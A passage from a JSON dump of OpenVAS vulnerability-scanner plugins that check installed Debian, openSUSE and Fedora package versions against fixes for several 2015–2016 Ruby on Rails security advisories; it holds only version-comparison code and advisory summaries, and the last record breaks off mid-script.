Advisory DSA 3509-1 (rails - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2098", "CVE-2016-0752", "CVE-2016-2097"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703509", "href": "http://plugins.openvas.org/nasl.php?oid=703509", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3509.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3509-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703509);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-0752\", \"CVE-2016-2097\", \"CVE-2016-2098\");\n script_name(\"Debian Security Advisory DSA 3509-1 (rails - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-03-09 00:00:00 +0100 (Wed, 09 Mar 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3509.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"rails on Debian Linux\");\n script_tag(name: \"insight\", value: \"Rails is a full-stack, open-source web\nframework in Ruby for writing real-world applications.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthese problems have been fixed in version 2:4.1.8-1+deb8u2.\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2:4.2.5.2-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2:4.2.5.2-1.\n\nWe recommend that you upgrade your rails packages.\");\n script_tag(name: \"summary\", value: \"Two vulnerabilities have been discovered\nin Rails, a web application framework written in Ruby. Both vulnerabilities affect\nAction Pack, which handles the web requests for Rails.\n\nCVE-2016-2097Crafted requests to Action View, one of the components of Action Pack,\nmight result in rendering files from arbitrary locations, including\nfiles beyond the application's view directory. This vulnerability is\nthe result of an incomplete fix of\nCVE-2016-0752 \n.\nThis bug was found by Jyoti Singh and Tobias Kraze from Makandra.\n\nCVE-2016-2098 \nIf a web applications does not properly sanitize user inputs, an\nattacker might control the arguments of the render method in a\ncontroller or a view, resulting in the possibility of executing\narbitrary ruby code.\nThis bug was found by Tobias Kraze from Makandra and joernchen of\nPhenoelit.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed\nsoftware version using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"rails\", ver:\"2:4.1.8-1+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-actionmailer\", ver:\"2:4.1.8-1+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-actionpack\", ver:\"2:4.1.8-1+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-actionview\", ver:\"2:4.1.8-1+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activemodel\", ver:\"2:4.1.8-1+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activerecord\", ver:\"2:4.1.8-1+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activesupport\", ver:\"2:4.1.8-1+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activesupport-2.3\", ver:\"2:4.1.8-1+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-rails\", ver:\"2:4.1.8-1+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-railties\", ver:\"2:4.1.8-1+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"rails\", ver:\"2:4.2.5.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-actionmailer\", ver:\"2:4.2.5.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-actionpack\", ver:\"2:4.2.5.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-actionview\", ver:\"2:4.2.5.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activejob\", ver:\"2:4.2.5.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activemodel\", ver:\"2:4.2.5.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activerecord\", ver:\"2:4.2.5.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activesupport\", ver:\"2:4.2.5.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-rails\", ver:\"2:4.2.5.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-railties\", ver:\"2:4.2.5.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:35:01", "description": "Two vulnerabilities have been discovered\nin Rails, a web application framework written in Ruby. Both vulnerabilities affect\nAction Pack, which handles the web requests for Rails.\n\nCVE-2016-2097Crafted requests to Action View, one of the components of Action Pack,\nmight result in rendering files from arbitrary locations, including\nfiles beyond the application", "cvss3": {}, "published": "2016-03-09T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3509-1 (rails - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2098", "CVE-2016-0752", "CVE-2016-2097"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703509", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703509", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3509.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3509-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703509\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-0752\", \"CVE-2016-2097\", \"CVE-2016-2098\");\n script_name(\"Debian Security Advisory DSA 3509-1 (rails - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-09 00:00:00 +0100 (Wed, 09 Mar 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3509.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(8|9)\");\n script_tag(name:\"affected\", value:\"rails on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthese problems have been fixed in version 2:4.1.8-1+deb8u2.\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2:4.2.5.2-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2:4.2.5.2-1.\n\nWe recommend that you upgrade your rails packages.\");\n script_tag(name:\"summary\", value:\"Two vulnerabilities have been discovered\nin Rails, a web application framework written in Ruby. Both vulnerabilities affect\nAction Pack, which handles the web requests for Rails.\n\nCVE-2016-2097Crafted requests to Action View, one of the components of Action Pack,\nmight result in rendering files from arbitrary locations, including\nfiles beyond the application's view directory. This vulnerability is\nthe result of an incomplete fix of\nCVE-2016-0752\n.\nThis bug was found by Jyoti Singh and Tobias Kraze from Makandra.\n\nCVE-2016-2098\nIf a web applications does not properly sanitize user inputs, an\nattacker might control the arguments of the render method in a\ncontroller or a view, resulting in the possibility of executing\narbitrary ruby code.\nThis bug was found by Tobias Kraze from Makandra and joernchen of\nPhenoelit.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed\nsoftware version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"rails\", ver:\"2:4.1.8-1+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-actionmailer\", ver:\"2:4.1.8-1+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-actionpack\", ver:\"2:4.1.8-1+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-actionview\", ver:\"2:4.1.8-1+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activemodel\", ver:\"2:4.1.8-1+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activerecord\", ver:\"2:4.1.8-1+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activesupport\", ver:\"2:4.1.8-1+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activesupport-2.3\", ver:\"2:4.1.8-1+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-rails\", ver:\"2:4.1.8-1+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-railties\", ver:\"2:4.1.8-1+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"rails\", ver:\"2:4.2.5.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-actionmailer\", ver:\"2:4.2.5.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-actionpack\", ver:\"2:4.2.5.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-actionview\", ver:\"2:4.2.5.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activejob\", ver:\"2:4.2.5.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activemodel\", ver:\"2:4.2.5.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activerecord\", ver:\"2:4.2.5.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activesupport\", ver:\"2:4.2.5.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-rails\", ver:\"2:4.2.5.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-railties\", ver:\"2:4.2.5.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:36:34", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-20T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for rubygem-actionpack-3_2 (openSUSE-SU-2016:0835-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2098", "CVE-2016-2097"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851251", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851251", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851251\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-03-20 06:18:10 +0100 (Sun, 20 Mar 2016)\");\n script_cve_id(\"CVE-2016-2097\", \"CVE-2016-2098\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for rubygem-actionpack-3_2 (openSUSE-SU-2016:0835-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-actionpack-3_2'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for rubygem-actionpack-3_2 fixes the following issues:\n\n - CVE-2016-2097: rubygem-actionview: Possible Information Leak\n Vulnerability in Action View. (boo#968850)\n\n - CVE-2016-2098: rubygem-actionpack: Possible remote code execution\n vulnerability in Action Pack (boo#968849)\");\n\n script_tag(name:\"affected\", value:\"rubygem-actionpack-3_2 on openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:0835-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-actionpack-3_2\", rpm:\"rubygem-actionpack-3_2~3.2.17~3.10.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-actionpack-3_2-doc\", rpm:\"rubygem-actionpack-3_2-doc~3.2.17~3.10.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:18", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-02-29T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-activemodel FEDORA-2016-94", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7576", "CVE-2016-0751", "CVE-2015-7581", "CVE-2016-0753", "CVE-2016-0752"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310807438", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807438", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-activemodel FEDORA-2016-94\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807438\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-29 06:24:55 +0100 (Mon, 29 Feb 2016)\");\n script_cve_id(\"CVE-2015-7581\", \"CVE-2015-7576\", \"CVE-2016-0751\", \"CVE-2016-0752\", \"CVE-2016-0753\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-activemodel FEDORA-2016-94\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-activemodel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-activemodel on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-94\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-February/178043.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-activemodel\", rpm:\"rubygem-activemodel~4.2.0~2.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:35:11", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-02-29T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-actionpack FEDORA-2016-94", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7576", "CVE-2016-0751", "CVE-2015-7581", "CVE-2016-0753", "CVE-2016-0752"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310807434", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807434", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-actionpack FEDORA-2016-94\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807434\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-29 06:25:03 +0100 (Mon, 29 Feb 2016)\");\n script_cve_id(\"CVE-2015-7581\", \"CVE-2015-7576\", \"CVE-2016-0751\", \"CVE-2016-0752\", \"CVE-2016-0753\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-actionpack FEDORA-2016-94\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-actionpack'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-actionpack on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-94\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-February/178042.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-actionpack\", rpm:\"rubygem-actionpack~4.2.0~3.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:35:18", "description": "Multiple security issues have been\ndiscovered in the Ruby on Rails web application development framework, which may\nresult in denial of service, cross-site scripting, information disclosure or\nbypass of input validation.", "cvss3": {}, "published": "2016-02-05T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3464-1 (rails - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7577", "CVE-2015-3227", "CVE-2015-7576", "CVE-2016-0751", "CVE-2015-7581", "CVE-2016-0753", "CVE-2015-3226", "CVE-2016-0752"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703464", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703464", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3464.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3464-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703464\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2015-3226\", \"CVE-2015-3227\", \"CVE-2015-7576\", \"CVE-2015-7577\",\n \"CVE-2015-7581\", \"CVE-2016-0751\", \"CVE-2016-0752\", \"CVE-2016-0753\");\n script_name(\"Debian Security Advisory DSA 3464-1 (rails - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-05 13:14:24 +0530 (Fri, 05 Feb 2016)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3464.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"rails on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthese problems have been fixed in version 2:4.1.8-1+deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2:4.2.5.1-1.\n\nWe recommend that you upgrade your rails packages.\");\n script_tag(name:\"summary\", value:\"Multiple security issues have been\ndiscovered in the Ruby on Rails web application development framework, which may\nresult in denial of service, cross-site scripting, information disclosure or\nbypass of input validation.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = 